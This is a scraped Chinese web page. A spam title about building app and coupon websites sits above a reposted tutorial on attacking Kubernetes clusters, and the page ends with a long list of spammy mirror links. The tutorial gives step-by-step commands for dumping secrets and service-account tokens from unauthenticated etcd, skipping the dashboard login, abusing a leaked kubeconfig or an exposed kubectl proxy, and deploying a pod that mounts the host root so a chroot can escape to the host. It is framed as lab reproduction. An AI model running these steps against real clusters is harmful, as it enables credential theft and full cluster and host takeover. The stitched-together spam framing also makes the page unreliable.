当前位置：首页 > news >正文

做app的网站有哪些如何自己做优惠卷网站

news 2025/10/31 4:33:55

做app的网站有哪些,如何自己做优惠卷网站,法律网站建设,提高手机性能的黑科技软件目录云原生-K8s安全-etcd(Master-数据库)未授权访问 etcdV2版本利用 etcdV3版本利用云原生-K8s安全-Dashboard(Master-web面板)未授权访问云原生-K8s安全-Configfile鉴权文件泄漏云原生-K8s安全-Kubectl Proxy不安全配置知识点#xff1a; 1、云原生-K8s安全-etcd未…目录云原生-K8s安全-etcd(Master-数据库)未授权访问 etcdV2版本利用 etcdV3版本利用云原生-K8s安全-Dashboard(Master-web面板)未授权访问云原生-K8s安全-Configfile鉴权文件泄漏云原生-K8s安全-Kubectl Proxy不安全配置知识点 1、云原生-K8s安全-etcd未授权访问 2、云原生-K8s安全-Dashboard未授权访问 3、云原生-K8s安全-Configfile鉴权文件泄漏 4、云原生-K8s安全-Kubectl Proxy不安全配置云原生-K8s安全-etcd(Master-数据库)未授权访问实战中不会常见利用条件比较苛刻。默认通过证书认证起一个数据库作用。主要存放节点的数据如一些token和证书。攻击23791端口配置映射 /etc/kubernetes/manifests/etcd.yaml第一种(满足)在安装etcd时没有配置指定--client-cert-auth 参数打开证书校验暴露在外Etcd服务存在未授权访问风险。暴露外部可以访问直接未授权访问获取secrets和token利用重启kubelet进程 systemctl restart kubelet第二种在打开证书校验选项后通过本地127.0.0.1:2379可免认证访问Etcd服务但通过其他地址访问要携带cert(证书)进行认证访问一般配合ssrf或其他利用较为鸡肋。只能本地访问直接未授权访问获取secrets和token利用第三种(满足)实战中在安装k8s默认的配置2379只会监听本地(127.0.0.1)如果访问没设置0.0.0.0暴露那么也就意味着最多就是本地访问不能公网访问只能配合ssrf或其他。只能本地访问利用ssrf或其他进行获取secrets和token利用复现搭建 https://www.cnblogs.com/qtzd/p/k8s_etcd.html 复现利用etcdV2/V3版本利用参考 https://www.cnblogs.com/qtzd/p/k8s_etcd.html https://www.wangan.com/p/7fy7f81f02d9563a 暴露etcd未授权-获取secretstoken-通过token访问API-Server接管 etcdV2版本利用直接访问http://ip:2379/v2/keys/?recursivetrue 可以看到所有的key-value值。secrets token etcdV3版本利用安装etcdctlhttps://github.com/etcd-io/etcd/releases 安装kubectlhttps://kubernetes.io/zh-cn/docs/tasks/tools/install-kubectl-linux 1、连接提交测试 ./etcdctl --endpoints192.168.139.136:23791 get / --prefix./etcdctl --endpoints192.168.139.136:23791 put /testdir/testkey1 Hello world1./etcdctl -- endpoints192.168.139.136:23791 put /testdir/testkey2 Hello world2 ./etcdctl -- endpoints192.168.139.136:23791 put /testdir/testkey3 Hello world32、获取k8s的secrets ./etcdctl --endpoints192.168.139.136:23791 get / --prefix --keys-only | grep /secrets/3、读取service account token ./etcdctl --endpoints192.168.139.136:23791 get / --prefix --keys-only | grep /secrets/kube-system/clusterrole./etcdctl --endpoints192.168.139.136:23791 get /registry/secrets/kube-system/clusterrole-aggregation-controller-token-jdp5z4、通过token访问API-Server获取集群的权限 kubectl --insecure-skip-tls-verify -s https://127.0.0.1:6443/ --tokeney... -n kube-system get podsSSRF解决限制访问-获取secretstoken-通过token访问API-Server接管云原生-K8s安全-Dashboard(Master-web面板)未授权访问默认端口8001(一般会被映射成别的端口) 配置不当导致dashboard未授权访问,通过dashboard我们可以控制整个集群。 kubernetes dashboard的未授权其实分两种情况一种是在本身就存在着不需要登录的http接口但接口本身并不会暴露出来如接口被暴露在外就会导致dashboard未授权。另外一种情况则是开发嫌登录麻烦修改了配置文件使得安全接口https的dashboard页面可以跳过登录。复现利用前提条件用户开启enable-skip-login时可以在登录界面点击跳过登录进dashboardKubernetes-dashboard绑定cluster-admin拥有管理集群的最高权限) 1、安装 https://blog.csdn.net/justlpf/article/details/130718774 2、启动 kubectl create -f recommended.yaml 3、卸载 kubectl delete -f recommended.yaml4、查看状态 kubectl get pod,svc -n kubernetes-dashboard5、利用新增Pod后续同前面利用一致 apiVersion: v1 kind: Pod metadata:name: xiaodisec spec:containers:- image: nginxname: xiaodisecvolumeMounts:- mountPath: /mntname: test-volumevolumes:- name: test-volumehostPath:path: /找到暴露面板-dashboard跳过-创建或上传pod-进入pod执行-利用挂载逃逸云原生-K8s安全-Configfile鉴权文件泄漏攻击者通过Webshell、Github等拿到了K8s配置的Config文件操作集群从而接管所有容器。 K8s configfile作为K8s集群的管理凭证其中包含有关K8s集群的详细信息(API Server、登录凭证)。如果攻击者能够访问到此文件(如办公网员工机器入侵、泄露到Github的代码等)就可以直接通过API Server接管K8s集群带来风险隐患。用户凭证保存在kubeconfig文件中通过以下顺序来找到kubeconfig文件如果提供了--kubeconfig参数就使用提供的kubeconfig文件如果没有提供--kubeconfig参数但设置了环境变量$KUBECONFIG则使用该环境变量提供的kubeconfig文件如果以上两种情况都没有kubectl就使用默认的kubeconfig文件~/.kube/config 复现利用K8s-configfile-创建Pod/挂载主机路径-Kubectl进入容器-利用挂载逃逸 1、将获取到的config复制 2、安装kubectl使用config连接安装kubectlhttps://kubernetes.io/zh-cn/docs/tasks/tools/install-kubectl-linux 连接 kubectl -s https://192.168.139.130:6443/ --kubeconfigconfig --insecure-skip-tls-verifytrue get nodes3、上传利用test.yaml创建pod kubectl apply -f test.yaml -n default --kubeconfigconfig4、连接pod后进行容器挂载逃逸 kubectl exec -it xiaodisec bash -n default --kubeconfigconfigcd /mnt chroot . bash云原生-K8s安全-Kubectl Proxy不安全配置当运维人员需要某个环境暴露端口或者IP时会用到Kubectl Proxy 使用kubectl proxy命令就可以使API server监听在本地的xxxx端口上环境搭建 kubectl --insecure-skip-tls-verify proxy --accept-hosts^.*$ --address0.0.0.0 --port8009 复现利用类似某个不需认证的服务应用只能本地访问被代理出去后形成了外部攻击入口点。找到暴露入口点根据类型选择合适方案 kubectl -s http://192.168.139.130:8009 get pods -n kube-system
文章转载自：
http://www.morning.kqxng.cn.gov.cn.kqxng.cn
http://www.morning.jkmjm.cn.gov.cn.jkmjm.cn
http://www.morning.blznh.cn.gov.cn.blznh.cn
http://www.morning.nnttr.cn.gov.cn.nnttr.cn
http://www.morning.lbcfj.cn.gov.cn.lbcfj.cn
http://www.morning.jzyfy.cn.gov.cn.jzyfy.cn
http://www.morning.hqwcd.cn.gov.cn.hqwcd.cn
http://www.morning.tqfnf.cn.gov.cn.tqfnf.cn
http://www.morning.pmftz.cn.gov.cn.pmftz.cn
http://www.morning.qhkx.cn.gov.cn.qhkx.cn
http://www.morning.zphlb.cn.gov.cn.zphlb.cn
http://www.morning.qsy39.cn.gov.cn.qsy39.cn
http://www.morning.spqtq.cn.gov.cn.spqtq.cn
http://www.morning.mghgl.cn.gov.cn.mghgl.cn
http://www.morning.dfqmy.cn.gov.cn.dfqmy.cn
http://www.morning.fhcwm.cn.gov.cn.fhcwm.cn
http://www.morning.dqxnd.cn.gov.cn.dqxnd.cn
http://www.morning.pfnwt.cn.gov.cn.pfnwt.cn
http://www.morning.kpxzq.cn.gov.cn.kpxzq.cn
http://www.morning.hksxq.cn.gov.cn.hksxq.cn
http://www.morning.tnktt.cn.gov.cn.tnktt.cn
http://www.morning.rdxnt.cn.gov.cn.rdxnt.cn
http://www.morning.wbfg.cn.gov.cn.wbfg.cn
http://www.morning.jgykx.cn.gov.cn.jgykx.cn
http://www.morning.bgqqr.cn.gov.cn.bgqqr.cn
http://www.morning.trrpb.cn.gov.cn.trrpb.cn
http://www.morning.zlzpz.cn.gov.cn.zlzpz.cn
http://www.morning.mkccd.cn.gov.cn.mkccd.cn
http://www.morning.pudejun.com.gov.cn.pudejun.com
http://www.morning.rwfj.cn.gov.cn.rwfj.cn
http://www.morning.jsljr.cn.gov.cn.jsljr.cn
http://www.morning.dxsyp.cn.gov.cn.dxsyp.cn
http://www.morning.rlqwz.cn.gov.cn.rlqwz.cn
http://www.morning.mrfnj.cn.gov.cn.mrfnj.cn
http://www.morning.ndzhl.cn.gov.cn.ndzhl.cn
http://www.morning.jltmb.cn.gov.cn.jltmb.cn
http://www.morning.wxrbl.cn.gov.cn.wxrbl.cn
http://www.morning.zlrrj.cn.gov.cn.zlrrj.cn
http://www.morning.nrcbx.cn.gov.cn.nrcbx.cn
http://www.morning.etsaf.com.gov.cn.etsaf.com
http://www.morning.nxrgl.cn.gov.cn.nxrgl.cn
http://www.morning.cszbj.cn.gov.cn.cszbj.cn
http://www.morning.ktrh.cn.gov.cn.ktrh.cn
http://www.morning.routalr.cn.gov.cn.routalr.cn
http://www.morning.fjgwg.cn.gov.cn.fjgwg.cn
http://www.morning.tjmfz.cn.gov.cn.tjmfz.cn
http://www.morning.stpkz.cn.gov.cn.stpkz.cn
http://www.morning.dmtld.cn.gov.cn.dmtld.cn
http://www.morning.lthtp.cn.gov.cn.lthtp.cn
http://www.morning.rfwrn.cn.gov.cn.rfwrn.cn
http://www.morning.rdfq.cn.gov.cn.rdfq.cn
http://www.morning.zztmk.cn.gov.cn.zztmk.cn
http://www.morning.tbnpn.cn.gov.cn.tbnpn.cn
http://www.morning.znsyn.cn.gov.cn.znsyn.cn
http://www.morning.msxhb.cn.gov.cn.msxhb.cn
http://www.morning.fsjcn.cn.gov.cn.fsjcn.cn
http://www.morning.smdkk.cn.gov.cn.smdkk.cn
http://www.morning.hgfxg.cn.gov.cn.hgfxg.cn
http://www.morning.fssjw.cn.gov.cn.fssjw.cn
http://www.morning.mwns.cn.gov.cn.mwns.cn
http://www.morning.fwjfh.cn.gov.cn.fwjfh.cn
http://www.morning.xjqrn.cn.gov.cn.xjqrn.cn
http://www.morning.ldspj.cn.gov.cn.ldspj.cn
http://www.morning.ndpwg.cn.gov.cn.ndpwg.cn
http://www.morning.ggfdq.cn.gov.cn.ggfdq.cn
http://www.morning.gfkb.cn.gov.cn.gfkb.cn
http://www.morning.rbmm.cn.gov.cn.rbmm.cn
http://www.morning.pbzlh.cn.gov.cn.pbzlh.cn
http://www.morning.rlksq.cn.gov.cn.rlksq.cn
http://www.morning.zlhzd.cn.gov.cn.zlhzd.cn
http://www.morning.hxwrs.cn.gov.cn.hxwrs.cn
http://www.morning.jjxxm.cn.gov.cn.jjxxm.cn
http://www.morning.fdfsh.cn.gov.cn.fdfsh.cn
http://www.morning.mmhaoma.com.gov.cn.mmhaoma.com
http://www.morning.tzmjc.cn.gov.cn.tzmjc.cn
http://www.morning.hlhqs.cn.gov.cn.hlhqs.cn
http://www.morning.dbbcq.cn.gov.cn.dbbcq.cn
http://www.morning.kksjr.cn.gov.cn.kksjr.cn
http://www.morning.xkjrq.cn.gov.cn.xkjrq.cn
http://www.morning.hmgqy.cn.gov.cn.hmgqy.cn

查看全文

http://www.tj-hxxt.cn/news/264237.html